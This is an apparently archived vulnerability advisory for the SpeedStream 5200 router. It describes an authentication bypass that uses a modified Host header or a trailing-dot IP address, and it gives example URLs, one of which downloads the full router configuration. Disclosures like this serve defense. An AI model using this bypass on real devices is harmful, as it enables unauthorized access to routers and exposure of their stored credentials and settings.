SpeedStream 5200 Authentication Bypass Config Download Vulnerability

2008-11-07 23:01:04

######################################################################################

SpeedStream 5200 Authentication Bypass - hkm 12/10/2008
(Server: NetPort Software 1.1)

It is posible to bypass authentication by modifying the Host header.
If you use a Host that is not the authentic one it will not require authentication.

http://189.255.255.255./ - This would bypass authentication too.
http://189.255.255.255./x.cfg - This downloads the full router conifguration.


hkm [ @ ] hakim.ws
______________________________________________________________________________________
######################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.